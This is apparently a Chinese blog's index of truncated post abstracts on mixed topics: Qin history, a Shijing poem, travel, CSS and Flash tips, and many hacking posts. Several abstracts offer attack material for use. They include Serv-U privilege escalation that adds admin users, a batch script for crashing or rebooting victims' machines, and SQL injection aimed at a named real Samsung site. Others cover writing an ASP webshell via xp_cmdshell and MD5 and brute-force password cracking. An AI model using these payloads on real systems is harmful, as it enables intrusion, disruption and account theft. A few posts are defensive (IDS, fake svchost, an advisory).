摘要： PowerShadow Master（影子系统）[官方网站]:http://www.powershadow.com/cn/index.html 是款很奇特的小软件,当你安装它并重新启动电脑以后, 电脑会类似安装了双系统一样,多出一个启动项,选择其中PowerShadow Master的启动项后, 原系统是完全一样的使用,但是你的一切操作,包括安装程序(甚至运行病毒)在下次用原系统 启动时,都是无效... 阅读全文

摘要： 如今，逢此“信息就在指尖”的互联网时代，不少人都拥有自己的电子邮件、QQ号码、MSN等与亲朋好友联系的通信工具，更有许多人在社交网站上注册了自己的账号，这无疑会极大地方便我们的工作与生活。但随着利欲熏心的不法之徒盯上社交网络，普通的用户在上网时便面临着巨大的“被黑”风险。　　社交网络重点在于构建有着共同兴趣和活动的人们的在线社团，它也可以是对探索别人... 阅读全文

摘要： 秦始皇长子(？—前210)　　是秦朝统治者中具有政治远见的人物。他认为天下未定，百姓未安，反对实行「焚书坑儒」、「重法绳之臣」等政策，因而被秦始皇贬到上郡监蒙恬军。秦始皇死后，赵高等人害怕扶苏即位执政，便伪造诏书，指责扶苏在边疆和蒙恬屯兵期间，「为人不孝」、「士卒多耗，无尺寸之功」、「上书直言诽谤」，逼其自杀。　　因其母郑妃是郑国人，喜欢吟唱当地流行的情歌《山有扶苏》，始皇便将两人之子... 阅读全文

摘要： 诗经——《山有扶苏》 山有扶苏，隰有荷华。 不见子都，乃见狂且。 山有乔松，隰有游龙。 不见子充，乃见狡童。 注释： 扶苏：枝叶繁茂的大树。 隰：音席，洼地 荷华：荷花。 子都：古代著名的美男子。 狂：狂愚的人。且：音居，助词 乔松：高大的松树。 游龙：枝叶舒展的水荭。龙：茏，水荭。 子充：古代的美男子。 狡童：... 阅读全文

摘要： 去年 南方的一场大雪 打消了我所有的出行计划 好不容易买的的杭州车票也被迫退了 无比遗憾 今年 冬季 我还要去欣赏那西湖美景 品味那清香的菊花茶 感受乌镇的历史文化 虽然冬季去看不到苏堤春晓 据朋友说冬季的杭州更为美丽 而且不是旅游高峰 能够让旅游者真正感受到杭州的美丽 冬季好像也是天鹅回到西湖的季节 希望我们也能够看到 先写到这吧 阅读全文

摘要： serv-u ftp本地溢出权限提升(使用6.0以及以前版本) 0.用Serv-U提权综合工具生成提权工具serv_u.exe1.先上传 serv_u.exe 到一个盘符下 比如是d盘2.执行命令 d:serv_u.exe3.d:serv_u.exe “net user username password /add” (注意命令要有引号)4.d:serv_u.exe“net localgroup... 阅读全文

摘要： 杀毒软件公司Panda Security最近列出了过去的六个月中出现的最意思的病毒.其中就有最恐怖病毒、最爱干净病毒和最具资讯功能病毒. 最恐怖病毒-MalwareProtector2008和AdvancedXpFixer会一点点得“吃掉”被感染电脑的桌面.实际上,这两个病毒是由一个杀毒软件公司制造的.该公司希望通过这种方式让用户使用他们的产品. 最爱干净病毒-Tixcet.A会删除用户硬盘上... 阅读全文

摘要： Flash被称为是“最为灵活的前台”，由于其独特的时间片段分割（TimeLine）和重组（MC嵌套）技术，结合ActionScitp的对象和流程控制，使得在灵活的界面设计和动画设计成为可能，同时它也是最为小巧的前台。Flash具有跨平台的特性（这点和Java一样），所以无论你处于处于何种平台，只要你安装了支持的Flash Player，就可以保证它们的最终显示效果的一致，而不必像在以前的网页设计... 阅读全文

摘要： Flash 最早期的版本称为Future Splash Animator，当时Future Splash Animator最大的两个用户是微软（Microsoft）和迪斯尼（Disney）。1996年11月，Future Splash Animator卖给了MM（Macromedia.com），同时改名为Flash1.0 。这里不得不提到的人物是乔纳森·盖伊(Jonathan Gay)，是他和他的... 阅读全文

摘要： CSS bug是布局中最头疼的问题。我们需要兼顾各种浏览器，以期待获得一致的效果。非常遗憾的是各厂商之间的竞争导致很多问题的存在。而IE6与IE7在很多问题上也存在着很大的差别。在52CSS.com大量的技术文档中，也包含了这方面的内容。轻松的解决CSS bug是我们必须掌握的技能。现在整理出最常用的12种CSS BUG解决方法以及CSS BUG类的小技巧。希望对您的学习、工作有所帮助，如果您依然... 阅读全文

摘要： 以前看过分析家写过一篇文章，介绍跨站脚本的安全隐患，当时只是知道有这样的 问题，也没有仔细阅读，目前此类问题经常在一些安全站点发布，偶刚好看到这样一篇文章 ， 抱着知道总比不知道好的想法，翻译整理了一下，原文在偶主页的collection目录里，错误 之处请 多多指点。 OK，go............ 什么是跨站脚本(CSS/XSS)? 我们所说跨站脚本是指在远程WEB页面的h... 阅读全文

摘要： 加快局域网访问速度Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/RemoteComputer/NameSpace] 删除其下的{2227A280-3AEA-1069-A2DE08002B30309D}（打印机）和{D6277990... 阅读全文

摘要： 在线破解MD5的网站上查。但有的MD5密码很偏，所以一些新手会放弃。我为新手介绍一种很简单就能修改难猜解MD5密码的方法。 常入侵的高手就忽略过.. 随便找个地址 http://www.xxx.org/news.asp?id=121 在地址后输入单引号，显示 Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’ ... 阅读全文

摘要： 响应键盘的方法作为AS中的一个重要组成部分，在如今已经越来越广泛的使用，尤其是在 FLASH游戏制作中，如果缺少了响应键盘的方法，那是不可能的，而响应键盘的方法主要的四种，分别是：1、利用按钮进行检测。2、利用KEY对象。3、利用键盘侦听的方法。4、利用影片剪辑的keyUp和keyDown事件来实现响应键盘 只有熟练掌握了这些方法，然后加以变通的话，就会得到很多意想不到的效果，下面我就结... 阅读全文

摘要： 最近老是有人问怎么处理照片 把下面的看完你就是高手了，呵呵 Photoshop从入门到精通教程详解（FLASH版），要下快下 并不保证能够长期的提供！！！！！总共100多M ... 阅读全文

摘要： 1:脚穿仿匡威款式的无牌鞋或者假匡威 2:身穿无款式无质量无品牌只有个性的五彩衣服。 3:绝对热爱网络，从开始的挂qq热追逐到踩空间热，qq名字和qq空间一定搞得非常花哨。喜欢把一帮不认识的照片放到相册给人家看 4:05年她们喜欢叫“d调的华丽” 5:06年她们喜欢诸如这些符号:的名字: ˙.& .o.灬…………... 阅读全文

摘要： 2008年5月19日清晨，我在网上不停的打开一个又一个网站，看到到的都是一个基色---那就是灰黑色!!! 这是一个怎样的中国互联网，自从中国有网以来，大家都在为制作一个色彩鲜艳的具有个性和特色的网站而努力，但今天，2008年5月19日所有的中国互联网络在为一个基色而努力---那就是灰黑色! 大家的CSS里，HTML里都添加了这么一句代码--灰黑色滤镜!不要商量，没有协议，没有号召，所有互联... 阅读全文

摘要： Nod32用户紧急注意： 各位用户： 我们接到多位用户反映，ESET NOD32在升级到最新的病毒库后出现了将一些软件的文件误报为“Unknown病毒变种“的情况。请各位没有升级到3119以下版本的用户暂时不要更新到最新版本。如果已经更新到3120时，当出现文件被识别... 阅读全文

摘要： 哀悼日结束了 心情还是很沉重的 向在这次灾难中遇难的同胞们致哀 向还在第一线工作的同志们致敬 我与女朋友通过短信捐了30元钱 尽一点我们的心意 虽然这点钱很微不足道 但我这个心还是和灾区人们在一起的 希望他们早一天渡过..... 原逝者安息 生者坚强 祝福中国 阅读全文

摘要： 使用方法： 最简单的把页面变成灰色的代码是在head 之间加 第一情况：把下面代码复制到你网页的中就可以了实现 第二情况：如果你的站已有CSS，那加入 html { filter:progid:DXImageTransform.Microsoft.BasicImage(grayscale=1); } 就可以了 第三情况：如果你的CSS中已有BODY {}那么你就加入 filter:pro... 阅读全文

摘要： 很多网上安全教程都介绍了如何通过百度和GOOGLE来搜索漏洞代码而发动攻击，这种文章在实际应用中没有什么价值，毕竟很多时候我们需要定点定位攻击目标服务器而不是这种广撒网覆盖形式的入侵。只有学会针对某定点服务器进行扫描和攻击才有利于我们增长企业安全防范与攻击技术，今天笔者就从实际出发带领各位IT168读者学习针对某固定服务器的扫描入侵一条龙操作，让读者对攻击与防御有一个零距离的接触。 一，扫... 阅读全文

摘要： 站内搜索地址为： httpwww.google.comcustomdomains=（这里写我们要搜索的站点，比如feelids.com） 进去可以选择www和feelids.com， 当然再选我们要的站内搜索哦！ 黑客专用信息和资料搜索地址为： httpwww.google.comcustomhl=xx-hacker 这里是google关键字的用法，要设置它为中文，则是 httpww... 阅读全文

摘要： 第一个:让别人内存OVER(逼他重启) @echo off start cmd %0 就这3行了 第二个:让对方重启指定次数(害人专用) @echo off if not exist c:\1.txt echo. >c:\1.txt & goto err1 if not exist c:\2.txt echo. >c:\2.txt & goto err1 if not ex... 阅读全文

摘要： 兰董，本来吧，你折腾一次两次也就算了，你身为80后，也知道，咱们80后做人很低调的！可今天一上网，很不幸又看到你，而且还出第三季了，挺有才啊！你知道我看了之后有什么感觉吗？反胃，那TM叫一个反胃，本来就够瘦的，我容易么我？你再让我吃不下饭，太不厚道了！标榜着不要在网上骂这个骂那个，嘴里却SB,SB的叫个不停，阿姨，你怎么能如此的虚伪？我真怀疑你是否受过教育，抑或是从小缺少母爱？看着你在那胡言乱... 阅读全文

摘要： 今天看到有个关于搜索型注入的文章，用到的是一种新技术，探测的是三星：http://notebook.samsung.com.cn/index.aspx 注入方式是： 一般网站的搜索都是部分匹配的 有漏洞的url是http://notebook.samsung.com.cn/news/news.aspx& ... t&ST=title&SC= 构造注入语句 三星%’and 1=1 and... 阅读全文

摘要： 1、 用^转义字符来写ASP(一句话木马)文件的方法: ? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^ >c:\mu.asp';-- ? echo ^ >c:\mu.asp 2、 显示SQL系统版本： ? http://192.168.1.5/display.asp?keyno=18... 阅读全文

摘要： 1. IDS(入侵检测系统)存在与发展的必然性 (1)网络安全本身的复杂性，被动式的防御方式显得力不从心。 (2)有关防火墙：网络边界的设备;自身可以被攻破;对某些攻击保护很弱;并非所有威胁均来自防火墙外部。 (3)入侵很容易：入侵教程随处可见;各种工具唾手可得 2. 入侵检测(Intrusion Detection) ●定义：通过从计算机网络或计算机系统中... 阅读全文

摘要： 安全公告号:MS07-041 漏洞名称:Microsoft Internet Information Services 中的漏洞可能允许远程执行代码 微软名称:KB939373 漏洞的影响:远程执行代码 最高严重等级:重要 建议:Microsoft 建议用户立即应用此更新。 漏洞描述:此重要安全更新可解决一个秘密报告的漏洞。 如果攻击者向 Windows XP Professional Servi... 阅读全文

摘要： DIV+CSS技术优势 业界越来越关注DIV+CSS的标准化设计，大到各大门户网站，小到不计其数的个人网站，在Div+CSS标准化的影响下，网页设计人员已经把这一要求作为行业标准。那么什么是Div+CSS标准？Div+CSS的标准化设计到底有什么好处？ Div 全称 division 意为“区分”使用 DIV 的方法跟使用其他 tag 的方法一样。 Very excellent webmaster... 阅读全文

摘要： 我的破解办法 先下载 dv.exe 下载后 把这 工具直接保存在 C盘 不需要去点击他它! 把你要破解的 md5 密码和帐号 保存为1.txt 也保存在C盘 格式为 密码在前 帐号在后 中间隔几个空格(帐号无关紧要,你可以用那个真帐号,也可以用1,2,3...来代替 只要 破解出来后 知道 知道破的那个密码对应的那个帐号 就行) 例如: r5r312trt3556... 阅读全文

摘要： 一般来说，形如1e4dc79d489e86b2的16位或者32位密码就是经过MD5加密的，(当然也有特殊，比如DVBBS在登陆时候会先产生一个16位的随机密码,当然，这个密码还是和MD5密码的形式有点区别，相同的是都是16位的数字+字母组合 。); 这个一般来说可以用一个叫dv.exe的工具来破解。他可以破解加密前是10位以下的纯数字或者纯字母，破解纯数字的，速度超快，但是纯字母的，就慢了，当... 阅读全文

摘要： Svchost.exe是病毒的两种情况 1.利用假冒Svchost.exe名称的病毒程序 这种方式运行的病毒并没有直接利用真正的Svchost.exe进程，而是启动了另外一个名称同样是Svchost.exe的病毒进程，由于这个假冒的病毒进程并没有加载系统服务，它和真正的Svchost.exe进程是不同的，只需在命令行窗口中运行一下“Tasklist /svc”，如果看到哪个Svchost.ex... 阅读全文

摘要： 推荐一款图片处理软件《Turbo Photo》 是你处理图片得心应手 而且很简单 周么帮朋友处理图片 感觉用photo或firework太麻烦了 就在网上找有没有简单的方法 果然懒有懒得好处 让我又找到了一个很好的图片处理软件Turbo Photo 我们常用的非主流图片处理软件如google旗下的Picasa acdsee等软件都不如Turbo Photo功能那么全面 如果是要... 阅读全文

摘要： Top Right Banner Style #topright { position: absolute; right: 0; top: 0; display: block; height: 125px; width: 125px; background: url(TRbanner.gif) no-repeat; text... 阅读全文

摘要： 1. IDS(入侵检测系统)存在与发展的必然性 (1)网络安全本身的复杂性，被动式的防御方式显得力不从心。 (2)有关防火墙：网络边界的设备;自身可以被攻破;对某些攻击保护很弱;并非所有威胁均来自防火墙外部。 (3)入侵很容易：入侵教程随处可见;各种工具唾手可得 2. 入侵检测(Intrusion Detection) ●定义：通过从计算机网络或计算机系统中... 阅读全文

摘要： 首先，你总得有像样的字典吧。去国外网站上下Wordlist吧，或者自己写个简单的程序来生成字典。如果不会写程序，呵呵呵呵，那就下载字典生成程序吧 。(不过网上下的wordlist，或者用网上下的字典生成程序生成的字典，好像都不好用) 其次，你总得有工具来运用字典干活吧。可以从网上下载工具，比如大名鼎鼎的brutus。运行时的界面如下： 500)this.width=500" bo... 阅读全文

摘要： 回洛阳了 免去了两地奔波的麻烦 但一切也要从新开始了 心里难免有些忐忑 不知道这次的选择是对是错 既然选择了就从容的去面对吧 阅读全文

摘要： http://shutter.cdream.com/register.php?linkid=58343， 可以每天免费打电话，不过有时间限制 随着等级的提高每天通话时间也会不断提高 可以给移动 联通 小灵通打电话 我们已经测试了 可以打电话 相当不错啊，呵呵 大家可以点击下面的连接来注册 一个邮箱可以注册一个用户 大家多注册几个用户 就可以打很多电话了（无耻啊） 呵呵..... 阅读全文

摘要： “机器会思考么？” 1950年，数学家Alan Turing思考着这个问题，他用了一个小游戏来解答：让人通过电报机分别与另一个人和一个电脑交谈；如果他分辨不出哪一个是电脑，那么以Turing的标准，认为这个电脑就会思考。如今，由于人工智能的发明，Turing的这个游戏开始在网络上流行起来。一流聊天机器人ALICE(女)和顶级网络机器人Jabberwacky(男)都没有长时记忆体，他们只对前一句话做... 阅读全文

摘要： 好久没写过了 最近心情很烦闷 发一篇缓解一下心情.... 最近关于纵横时空文学站的安全检测很有意思 值得我们来学习研究 想了半天还是来说一说网络安全吧 Or 1=1的脚本注入技术 我们用雷霆购物系统做or注入演示。我们先用or 1=1和or 1=2来测试是否存在注入点，我们先来看正常页面的面貌。我们现在用or 1=1测试是否存在注入漏洞。返回的是另外一个页面，我们再来测试or 1=2。返回... 阅读全文